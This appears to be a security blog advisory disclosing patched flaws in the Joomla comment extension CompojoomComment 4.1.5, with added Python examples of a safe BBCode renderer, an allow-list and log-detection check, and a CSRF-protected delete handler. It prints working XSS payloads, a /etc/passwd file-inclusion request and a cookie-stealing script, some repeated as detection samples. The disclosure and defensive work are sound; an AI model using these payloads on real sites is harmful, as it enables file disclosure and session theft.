jeffchannell.com

CompojoomComment 4.1.5 Multiple Vulnerabilities

Posted in Joomla!
2010-09-01 20:48:02 +0000 UTC

Since the CompojoomComment Hacking Contest is now over, and I was the only winner, I figured I'd go ahead and share my winning entries. These vulnerabilities are present in CompojoomComment 4.1.5, and are all patched in the latest (4.1.7 at the time of this writing).

Malformed BBCode Persistent XSS, #1

a[img]b[img]c[/img]d[/img]e
a[url=http://jeffchannell.com]b[img]c=''/style='position:absolute;top:-1px;left:-1px;width:999em;height:999em'/onmouseover='location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104,97,110,110,101,108,108,46,99,111,109)'/[/url]d[/img]e

Malformed BBCode Persistent XSS, #2

[url=a]b'c='[img][/url]d[color=red]e[/img] onmouseover='location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104,97,110,110,101,108,108,46,99,111,109)' style='position:absolute;top:1px;left:1px;width:999em;height:999em' [/color]
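Both payloads above work because the parser emits HTML for tags it has not actually matched, so user text ends up inside an attribute. The renderer below is an added example in Python (not CompojoomComment's PHP code; the tag set, URL rules and the sample strings are this example's own, with the two samples modelled on the payloads above, the second shortened): it escapes every character of user text, only turns a tag into an element once its closing tag has been seen, validates every attribute value before it is emitted, and shows anything unbalanced as plain text.

```python
import html
import re
from urllib.parse import urlparse

# Assumption: a small BBCode dialect of our own; only these tags are recognised.
TOKEN = re.compile(r"\[(/?)(url|img|color|b|i)(?:=([^\]]*))?\]", re.IGNORECASE)
COLOR = re.compile(r"^(?:[A-Za-z]{1,20}|#[0-9A-Fa-f]{3}|#[0-9A-Fa-f]{6})$")
SAFE_SCHEMES = {"http", "https"}

# Constructed samples modelled on the two malformed payloads in the advisory.
MALFORMED_1 = "a[img]b[img]c[/img]d[/img]e"
MALFORMED_2 = "[url=a]b'c='[img][/url]d[color=red]e[/img] onmouseover='alert(1)' [/color]"


def safe_url(raw):
    """Return raw if it is an absolute http(s) URL with no attribute-breaking characters, else None."""
    candidate = raw.strip()
    parsed = urlparse(candidate)
    if parsed.scheme.lower() not in SAFE_SCHEMES or not parsed.netloc:
        return None
    if any(ch in candidate for ch in "'\"<>\t\n "):
        return None
    return candidate


def wrap(tag, attr, inner, raw_open, raw_close):
    """Emit HTML for a balanced tag pair, or the escaped BBCode literally when the tag is rejected."""
    literal = html.escape(raw_open) + inner + html.escape(raw_close)
    if tag == "img":
        # The body of [img] must be a bare URL: no nested markup, no attribute.
        if attr is not None or "<" in inner:
            return literal
        url = safe_url(html.unescape(inner))
        return literal if url is None else f'<img src="{html.escape(url)}" alt="">'
    if tag == "url":
        url = safe_url(attr or "")
        return literal if url is None else f'<a href="{html.escape(url)}" rel="nofollow">{inner}</a>'
    if tag == "color":
        if attr is None or not COLOR.fullmatch(attr):
            return literal
        return f'<span style="color:{attr}">{inner}</span>'
    return f"<{tag}>{inner}</{tag}>"  # b and i carry no attribute


def render_bbcode(text):
    """Render BBCode to HTML. All user text is HTML-escaped; only balanced,
    validated tags become elements; anything unbalanced is shown as text."""
    out = []
    stack = []  # (tag, attr, raw open tag, index in out where the body starts)
    pos = 0
    for m in TOKEN.finditer(text):
        out.append(html.escape(text[pos:m.start()]))
        pos = m.end()
        closing, tag, attr = m.group(1) == "/", m.group(2).lower(), m.group(3)
        if not closing:
            stack.append((tag, attr, m.group(0), len(out)))
        elif stack and stack[-1][0] == tag:
            open_tag, open_attr, raw_open, start = stack.pop()
            inner = "".join(out[start:])
            del out[start:]
            out.append(wrap(open_tag, open_attr, inner, raw_open, m.group(0)))
        else:
            out.append(html.escape(m.group(0)))  # stray or mismatched close tag
    out.append(html.escape(text[pos:]))
    # Tags never closed are shown literally; walk from the innermost so indices stay valid.
    for _tag, _attr, raw_open, start in reversed(stack):
        out.insert(start, html.escape(raw_open))
    return "".join(out)


if __name__ == "__main__":
    for sample in (MALFORMED_1, MALFORMED_2, "[url=http://example.com]site[/url]"):
        print(render_bbcode(sample))
```

With this approach the first payload renders as the literal text it is, and the second yields only a `<span>` whose body is escaped text; the `onmouseover` and `style` fragments never reach an attribute because attribute values come only from `safe_url` and `COLOR`, never from the surrounding text.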

Local File Inclusion

?option=com_comment
&no_html=1
&component=../../../../../../../../../../../../etc/passwd%00
&joscsectionid=0
&josctask=ajax_search
&comment_id=0
&content_id=999
&search_keyword=a
&search_phrase=any

Reflective XSS

?option=com_comment
&no_html=1
&component=<script>alert(document.cookie);</script>
&joscsectionid=0
&josctask=ajax_search
&comment_id=0
&content_id=999
&search_keyword=a
&search_phrase=any
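The local file inclusion and the reflected XSS above both ride on the same `component` parameter, which the extension uses as a file name and echoes back unescaped. The fix for both is the same: treat the value as a name to look up in an allow-list, never as a path or as HTML. The code below is an added example in Python (not the extension's PHP code; the allow-list entries, the `com_` naming rule and the three request lines are constructed for this example): `safe_component` is the allow-list check a handler would apply, and `classify_request` is the detection side, naming what is wrong with a `component` value seen in a web-server log.

```python
import re
from urllib.parse import parse_qs, unquote

# Assumption: the names the extension may load are fixed at deploy time.
# "com_content" and "com_k2" are placeholders for the real allow-list.
ALLOWED_COMPONENTS = {"com_content", "com_k2"}
COMPONENT_NAME = re.compile(r"com_[a-z0-9_]{1,40}")


def safe_component(raw):
    """Allow-list check for the component parameter.
    Returns the canonical name, or None when the value must be rejected."""
    if raw is None:
        return None
    value = unquote(raw)  # also catches a doubly-encoded value
    if "\x00" in value:   # a NUL byte (%00) truncated file names in PHP before 5.3.4
        return None
    if not COMPONENT_NAME.fullmatch(value):
        return None
    return value if value in ALLOWED_COMPONENTS else None


def classify_component(value):
    """Detection side: name each thing that is wrong with a component value."""
    findings = set()
    decoded = unquote(value)
    if "\x00" in decoded:
        findings.add("null_byte")
    if "../" in decoded or "..\\" in decoded:
        findings.add("traversal")
    if "<" in decoded or ">" in decoded:
        findings.add("markup")
    if not COMPONENT_NAME.fullmatch(decoded):
        findings.add("malformed")
    return findings


def classify_request(target):
    """Classify the component parameter of one request target (path plus query)."""
    query = target.partition("?")[2]
    values = parse_qs(query, keep_blank_values=True).get("component")
    if not values:
        return {"missing"}
    return classify_component(values[0])


# Constructed request targets as they might appear in an access log: one benign,
# one traversal attempt with a trailing NUL, one with markup in the parameter.
SAMPLE_REQUESTS = [
    "/index.php?option=com_comment&no_html=1&component=com_content&josctask=ajax_search&content_id=999",
    "/index.php?option=com_comment&no_html=1&component=../../../../../../etc/passwd%00&josctask=ajax_search&content_id=999",
    "/index.php?option=com_comment&no_html=1&component=%3Cscript%3Ealert(document.cookie)%3B%3C/script%3E&josctask=ajax_search&content_id=999",
]


if __name__ == "__main__":
    for target in SAMPLE_REQUESTS:
        print(sorted(classify_request(target)) or ["clean"], target)
```

Note that `safe_component` does not try to strip `../` or `%00` out of the value and carry on; it rejects anything that is not a known name, which is the only check that stays correct as encodings and traversal tricks change.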

Administrator Persistent XSS

The Name and Title inputs in the comment edit form aren't sanitized: a double quote in either field allows XSS in the administrator backend, but only if an administrator edits that comment.

Comment Deletion CSRF

Embedding the "delete comment" URL in an [img] BBCode results in the comment being deleted when a logged-in administrator loads the page containing it.
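The deletion works because the action is reachable with a plain GET and nothing ties the request to a page the site itself served. The handler below is an added example in Python (not the extension's code; the request model, session ids and comment store are constructed for it): it refuses state changes over GET, which is all an image fetch can produce, and requires a per-session HMAC token that a comment author has no way of knowing.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field

# Assumption: one secret per deployment. A real site loads it from configuration;
# generating it at import time is only for this self-contained example.
SERVER_SECRET = secrets.token_bytes(32)


def csrf_token(session_id):
    """Derive the anti-CSRF token for a session. It is only ever placed in forms
    the site renders, so a request triggered from a comment cannot include it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def token_valid(session_id, presented):
    # Constant-time comparison; a missing token compares as the empty string.
    return hmac.compare_digest(csrf_token(session_id), presented or "")


@dataclass
class Request:
    method: str
    session_id: str                 # identifies the logged-in administrator
    params: dict = field(default_factory=dict)


def handle_delete(request, comments):
    """Delete handler returning an HTTP-style status; `comments` is the store it modifies."""
    if request.method != "POST":
        return 405                  # an [img] tag can only ever issue a GET
    if not token_valid(request.session_id, request.params.get("token")):
        return 403                  # right session, but not from a form we rendered
    comment_id = request.params.get("id")
    if comment_id not in comments:
        return 404
    del comments[comment_id]
    return 200


def demo():
    """Three requests against a constructed store; returns the status codes and what survives."""
    comments = {"17": "spam", "18": "fine"}
    admin = "sess-admin"            # constructed session id
    img_fetch = Request("GET", admin, {"id": "17"})           # what an embedded image produces
    forged_post = Request("POST", admin, {"id": "17", "token": "0" * 64})
    real_post = Request("POST", admin, {"id": "17", "token": csrf_token(admin)})
    codes = [handle_delete(r, comments) for r in (img_fetch, forged_post, real_post)]
    return codes, sorted(comments)


if __name__ == "__main__":
    print(demo())
```

The two checks are deliberately independent: the method check alone already stops the [img] case, and the token check stops a forged form submission from any other origin as well.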

Timeline